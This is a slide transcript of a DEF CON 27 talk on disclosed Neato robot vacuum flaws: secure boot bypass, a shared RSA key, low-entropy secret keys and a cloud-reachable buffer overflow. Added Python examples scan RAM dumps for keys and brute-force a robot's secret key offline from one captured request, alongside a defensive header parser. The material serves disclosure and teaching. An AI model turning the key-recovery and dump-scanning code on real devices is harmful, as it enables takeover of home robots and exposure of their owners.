Vacuum Cleaning Security: Pinky and the Brain Edition (DEF CON 27)
Transcript of the slides.

Slide 1
Vacuum Cleaning Security: Pinky and the Brain Edition
Jiska Classen, Secure Mobile Networking Lab (SEEMOO), Technische Universität Darmstadt, Germany
Fabian Ullrich, IT Security Analyst @ ERNW GmbH, Heidelberg, Germany
Slides 2-3: Motivation
● A vacuum cleaning robot is in your house, has access to your Wi-Fi and knows many of your personal habits.
● Who of you owns a vacuum cleaning robot? (Own as in it's YOUR robot, neither your neighbor's nor someone's on the Internet!)
● Neato is one of the top vacuum cleaning robot models in the US.
● In Germany, Vorwerk has been selling vacuum cleaners forever (founded 1883). Their top model, a robot, is a rebranded Neato.
● Vorwerk won the test comparisons in Germany with their VR300/VR200.
Slide 4: Responsible Disclosure
● Robots were harmed during our experiments! (Sorry for that…)
● No customer data was leaked.
● Neato was informed and fixed all issues in time.
Slides 5-9: Infrastructure & Security Features
(Architecture diagram, built up over five slides; the labels are grouped here by component and link.)
● Robot: UI & USB console, manual robot commands, setup only. ✔ Secure boot ✔ Encrypted logs ✔ Signed firmware updates
● Beehive (cloud): account information. ✔ HTTPS ✔ RSA key (robot↔cloud)
● Nucleo (cloud): robot commands / status, robot commands and status responses.
● ?? (a component left unnamed on the slide): ✔ HTTPS
● Robot↔cloud links: ✔ HTTPS ✔ RSA key (robot↔cloud) ✔ Secret key (robot↔user)
● App links: ✔ HTTPS ✔ Secret key (robot↔user)
Slides 10-11: Contributions
● With all these security features, what could possibly go wrong?
● We bypass secure boot on a vacuum cleaning robot to extract its memory.
● Our key findings are… key findings! And a QNX side quest.
● We also gained unauthenticated RCE on robots over the cloud.
Slide 12: Secure Boot Bypass
● Custom AM335x chip (guessed from the form factor).
● The QNX 6.5 image from Foundry27 is bootable but crashes.
● Get the QNX SDP, modify the image, skip hardware initialization, reboot the Neato system into the custom image for a cold boot attack, and print all RAM to the serial port.
● Watchdog started by Pinky, cleaning logic binary started by Brain.
Jiska found this and got assigned CVE-2018-20785; fixed in Neato BotVac Connected D7 4.4.0-72 in December 2018 and for Vorwerk sometime after January 2019.
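What one does with the RAM that comes out of the serial port, as an added example that is not code from the talk or from Neato: a scanner over a raw dump that looks for PEM private-key headers, for the DER prefix of a PKCS#1 RSAPrivateKey (SEQUENCE, INTEGER version 0, INTEGER modulus), and for high-entropy windows that may be raw symmetric keys or ciphertext. The dump below is constructed with a known layout; the 512..4096 plausibility range for the DER length and the 6.5 bit entropy threshold are our choices.

```python
import hashlib
import math
from collections import Counter

PEM_MARKERS = (b"-----BEGIN RSA PRIVATE KEY-----", b"-----BEGIN PRIVATE KEY-----")
# DER PKCS#1 RSAPrivateKey with long-form lengths:
#   30 82 LL LL      SEQUENCE, 2-byte length
#   02 01 00         INTEGER version = 0
#   02 82            INTEGER modulus, 2-byte length follows
DER_SEQ = b"\x30\x82"
DER_VERSION_AND_MODULUS = b"\x02\x01\x00\x02\x82"


def find_pem(dump: bytes):
    """Offsets of PEM private-key headers in the dump."""
    hits = []
    for marker in PEM_MARKERS:
        start = 0
        while (i := dump.find(marker, start)) != -1:
            hits.append((i, marker.decode()))
            start = i + 1
    return sorted(hits)


def find_der_rsa_keys(dump: bytes):
    """Offsets where a DER RSAPrivateKey plausibly starts, with its declared length."""
    hits = []
    start = 0
    while (i := dump.find(DER_SEQ, start)) != -1:
        if dump[i + 4:i + 9] == DER_VERSION_AND_MODULUS:
            length = int.from_bytes(dump[i + 2:i + 4], "big")
            if 512 <= length <= 4096:  # RSA-1024 .. RSA-8192 sized structures (assumption)
                hits.append((i, length))
        start = i + 1
    return hits


def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte: 0 for constant data, about 7.2 for 256 random bytes."""
    n = len(chunk)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())


def high_entropy_windows(dump: bytes, window: int = 256, threshold: float = 6.5):
    """Non-overlapping windows that look like keys or ciphertext rather than code or text."""
    return [off for off in range(0, len(dump) - window + 1, window)
            if shannon_entropy(dump[off:off + window]) >= threshold]


def scan_dump(dump: bytes) -> dict:
    return {"pem": find_pem(dump), "der_rsa": find_der_rsa_keys(dump),
            "high_entropy": high_entropy_windows(dump)}


def build_sample_dump() -> bytes:
    """Constructed stand-in for a RAM dump, 2560 bytes with a known layout:
    zeros | text at 1024 | DER key header at 1280 | PEM header at 1536 | random at 1792 | zeros."""
    prng = b"".join(hashlib.sha256(b"seed" + bytes([i])).digest() for i in range(16))  # 512 B
    text = b"QNX Neutrino / astro / vendorPrivateKeyProduction".ljust(256, b"\x00")
    der = b"\x30\x82\x04\xa4" + b"\x02\x01\x00\x02\x82\x01\x01\x00" + prng[:244]  # 256 B
    pem = b"-----BEGIN RSA PRIVATE KEY-----\n".ljust(256, b"\x00")
    return b"\x00" * 1024 + text + der + pem + prng[256:] + b"\x00" * 512
```

Run `scan_dump(open("ram.bin", "rb").read())` on a real dump. The DER and PEM matches are exact, so they are worth following up first; the entropy windows are only a triage aid and also flag compressed data and code, so inspect them by hand. Keys that are stored encrypted on flash (as in /var/keys on this robot) only show up in the dump while the process that uses them has them decrypted in memory.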
Slides 13-14: Keys and their Purpose (1)
Secret Key
● Generated when associating a robot with a user account.
● Known by: robot, app and cloud components.
● Individual key for each robot/user account relation!
● Used for authenticating commands to the robot.

Header = Authorization: NEATOAPP [signature]
    string_to_sign = serial + date + message_body
    signature = HMAC_SHA256(secret_key, string_to_sign)
https://developers.neatorobotics.com/
Slides 15-16: Keys and their Purpose (2)
RSA Key
● Robots have to initially send the secret key to the cloud, so that transmission has to be authenticated.
● The secret key is not that secret:
○ Several third parties know it.
○ It cannot be used to authenticate the robot to the cloud.
● The RSA key is used to authenticate the robot to the cloud.

Header = Authorization: NEATOBOT [serial]:[signature]
    string_to_sign = serial + http_method + URI + date + body
    signature = sign_rsa_sha256(string_to_sign, rsa_private_key)
Slides 17-19: Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.

    rnd = rand();

    time_shift[0:3] = time_now;
    time_shift[4:6] = 0;
    time_shift[7] = 16;
    time_shift[8] = rnd + rnd / 0xFFFF;
    time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);
    time_shift[10:15] = robot_MAC;

● The entropy relies on the time of robot linkage: bytes 4 to 7 are constants, the MAC is not a secret, and the slides count no entropy for the two rand()-derived bytes, so the timestamp is the only unknown.
○ Linkage known to within one year = 25 bit
○ Linkage known to within one hour = 12 bit
● There are multiple offline attack scenarios.
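An added example, not code from the talk or from Neato, that serves slide 14 (the NEATOAPP request signature) and slides 17-19 (the time-dependent key): it builds the 16-byte buffer exactly as laid out above, derives the secret key from it, signs and verifies a request, and then runs the offline attack the slides allude to, recovering the key from one captured signed request when the linkage time is bracketed. Assumptions, all labelled in the code: the buffer is hashed with SHA-256 (slide 33 only says "before hashing"), time_now is a 32-bit Unix timestamp stored little-endian, entropy_reducing_math is replaced by a stand-in, rnd is modelled as an unknown byte (the slides give it no entropy at all), and the signature is hex-encoded; the serial, date and body are constructed.

```python
import hashlib
import hmac
import math
import struct

# Constructed robot MAC address; the attacker is assumed to know it.
ROBOT_MAC = bytes.fromhex("0011aabbccdd")


def entropy_reducing_math(x: int) -> int:
    """Stand-in for the unnamed function on the slide (our assumption). Whatever
    the real one does, it is a deterministic function of rnd, so it cannot add
    entropy; it can only keep or lose some."""
    return (x * 31 + 7) & 0xFF


def build_time_shift(time_now: int, rnd: int, mac: bytes) -> bytes:
    """Fills the 16-byte buffer exactly as laid out on the slide."""
    v = (rnd + rnd // 0xFFFF) & 0xFFFFFFFF
    buf = bytearray(16)
    buf[0:4] = struct.pack("<I", time_now & 0xFFFFFFFF)  # [0:3] = time_now (little-endian assumed)
    # [4:6] = 0 (bytearray is zero-initialised)
    buf[7] = 16
    buf[8] = v & 0xFF                        # [8] = rnd + rnd / 0xFFFF, truncated to a byte
    buf[9] = entropy_reducing_math(v)        # [9] = entropy_reducing_math(...)
    buf[10:16] = mac                         # [10:15] = robot_MAC
    return bytes(buf)


def derive_secret_key(time_now: int, rnd: int, mac: bytes) -> bytes:
    """The slides say the buffer is hashed; SHA-256 is our assumption."""
    return hashlib.sha256(build_time_shift(time_now, rnd, mac)).digest()


def sign_neatoapp(secret_key: bytes, serial: str, date: str, body: str) -> str:
    """Slide 14: Authorization: NEATOAPP [signature], with
    string_to_sign = serial + date + message_body and HMAC-SHA256 over it."""
    string_to_sign = (serial + date + body).encode()
    return hmac.new(secret_key, string_to_sign, hashlib.sha256).hexdigest()


def verify_neatoapp(secret_key: bytes, serial: str, date: str, body: str, signature: str) -> bool:
    """Robot-side check; constant-time comparison of the hex digests."""
    return hmac.compare_digest(sign_neatoapp(secret_key, serial, date, body), signature)


def timestamp_entropy_bits(window_seconds: int) -> int:
    """Slide 19's numbers: a one-hour window is 12 bit, a one-year window 25 bit."""
    return math.ceil(math.log2(window_seconds))


def recover_key(serial, date, body, signature, mac, t_start, t_end, rnd_candidates):
    """Offline attack: one captured NEATOAPP request plus the robot's MAC is enough.
    Every (timestamp, rnd) pair in the search space yields a candidate key; the
    first one whose HMAC matches the captured signature is the real one."""
    target = bytes.fromhex(signature)
    string_to_sign = (serial + date + body).encode()
    for t in range(t_start, t_end):
        for r in rnd_candidates:
            key = derive_secret_key(t, r, mac)
            if hmac.new(key, string_to_sign, hashlib.sha256).digest() == target:
                return t, r, key
    return None


def demo() -> bool:
    """Constructed scenario: the robot was linked 417 s into a 10-minute window
    the attacker knows; rnd is modelled as one unknown byte."""
    t0 = 1_546_300_800                        # 2019-01-01 00:00:00 UTC
    t_link, rnd = t0 + 417, 0xA7
    victim_key = derive_secret_key(t_link, rnd, ROBOT_MAC)
    serial = "OPS01234-0123456789AB"          # constructed serial
    date = "Tue, 01 Jan 2019 12:00:00 GMT"    # constructed date header
    body = '{"reqId": "1", "cmd": "getRobotState"}'
    captured_sig = sign_neatoapp(victim_key, serial, date, body)
    found = recover_key(serial, date, body, captured_sig, ROBOT_MAC, t0, t0 + 600, range(256))
    return found is not None and found[0] == t_link and found[2] == victim_key
```

The search cost is the product of the time window and the rnd candidates: 600 seconds times 256 values here, 2^12 times whatever rnd contributes for a one-hour window, 2^25 times that for a year. Hashing the buffer does not help; SHA-256 of a 25-bit input is still a 25-bit search, which is the point of "check entropy before hashing" on slide 33.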
Slides 20-22: RSA Keys for Robot Authenticity (1)
● Encrypted RSA keys in /var/keys.
● vendorPrivateKeyProduction sounds promising!
● Let's do some string de-obfuscation!
● The RSA key is the same for all robots.
Slides 23-27: RSA Keys for Robot Authenticity (2)
● We are able to impersonate arbitrary robots.
○ Allows for multiple other attacks.
○ For example: leak the victim's smartphone IP.
(Diagram, built up over five slides, with Nucleo in the middle: once the impersonated robot is talking to Nucleo, the real robot "does no longer get requests". The "Robot location?" query is answered with "Robot location is 1.3.3.7:42", and the "Manual drive…" session that follows is directed at 1.3.3.7:42, which is the step that exposes the smartphone's address.)
Slides 28-29: We ❤ QNX < 6.6
● Power plants, cars, and other critical applications run on QNX < 6.6. Today.
● The current version is 7.x, but many vendors might not have updated it so far.
● Default settings are no ASLR, no DEP :).
● The robots run on QNX 6.5 … Side quest: How secure is it?
Fabian and Johannes created a PoC for privilege escalation and got assigned CVE-2019-8998. http://support.blackberry.com/kb/articleDetail?articleNumber=000057178
Slides 30-31: Unauthenticated RCE
● Buffer overflow in the robot's Nucleo cloud connection daemon. (Diagram labels: Nucleo, /bin/astro, /bin/robot, Buffer Overflow.)
● Can be triggered with requests to https://nucleo.neatocloud.com:4443/vendors/neato/robots/[robot_serial]/messages.
● The overflow is within parsing the authentication header, which means that we found an unauthenticated RCE!
● All services run as root.
● Fix: Authentication headers are validated on Nucleo.
Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177), Johannes did further analysis and implemented a PoC (CVE-2018-19442).
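What "authentication headers are validated on Nucleo" can look like, as an added example that is not Neato's code and not from the talk: a strict parser for the two Authorization schemes shown on slides 14 and 16, applied at the relay before a message is forwarded to the robot, so that only a well-formed, bounded header ever reaches the parser that crashed. Assumptions: signatures are hex-encoded (64 characters for HMAC-SHA256, 256 to 1024 for RSA-1024 to RSA-4096), the serial grammar is a constructed placeholder, the length cap is our choice, and the serial-must-match-URL rule in `relay_accepts` is an extra check we add, not something the slides describe.

```python
import re
from dataclasses import dataclass
from typing import Optional

MAX_HEADER_LEN = 1100  # hard cap, checked before anything else (our choice)

# Constructed serial grammar; the real one is not on the slides.
_SERIAL = r"[A-Z0-9-]{8,24}"
# NEATOAPP [signature]: HMAC-SHA256, so exactly 64 hex characters (hex encoding assumed)
_NEATOAPP = re.compile(r"^NEATOAPP ([0-9a-fA-F]{64})$")
# NEATOBOT [serial]:[signature]: RSA-SHA256, 256 hex chars (RSA-1024) up to 1024 (RSA-4096)
_NEATOBOT = re.compile(rf"^NEATOBOT ({_SERIAL}):([0-9a-fA-F]{{256,1024}})$")


@dataclass(frozen=True)
class AuthHeader:
    scheme: str
    serial: Optional[str]
    signature: str


def parse_authorization(value: str) -> Optional[AuthHeader]:
    """Strict parse of the Authorization header; None means reject.
    Length and character class are enforced before the pattern match, so an
    oversized or binary header never reaches any length-sensitive code."""
    if not isinstance(value, str) or len(value) > MAX_HEADER_LEN:
        return None
    if not value.isascii() or any(ch in value for ch in "\r\n\x00"):
        return None
    m = _NEATOAPP.match(value)
    if m:
        return AuthHeader("NEATOAPP", None, m.group(1).lower())
    m = _NEATOBOT.match(value)
    if m:
        return AuthHeader("NEATOBOT", m.group(1), m.group(2).lower())
    return None


def relay_accepts(header_value: str, url_serial: str) -> bool:
    """Relay-side gate for /vendors/neato/robots/[robot_serial]/messages.
    Added check beyond the slide: a NEATOBOT header must name the serial in the URL,
    so a robot cannot post into another robot's message queue."""
    parsed = parse_authorization(header_value)
    if parsed is None:
        return False
    if parsed.scheme == "NEATOBOT" and parsed.serial != url_serial:
        return False
    return True
```

The relay check is a compensating control, not the fix for the bug: it protects only traffic that passes through Nucleo, and the daemon on the robot still needs its own bounds check on the header it parses. Rejecting on length first, before any pattern matching, is deliberate; it keeps the cost of a malformed header constant regardless of how long it is.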
Slide 32: Security Implications (1)
● IoT product at home? Keep it offline!
● As a customer:
○ Update your robot.
○ Hide your robot's serial number!
Slide 33: Security Implications (2)
● Connected ecosystem developers:
○ Using RSA, an RNG, hashing, secure boot, encrypted logs and signed firmware updates sounds good...
○ Review cryptographic key components and root of trust assumptions.
○ Dissecting one of your products should not compromise the security of the other products, i.e., do not share the same keys across devices.
○ Test your security-relevant code in practice to uncover issues like the static secret key "random" function: check entropy before hashing.
Slide 34: Q&A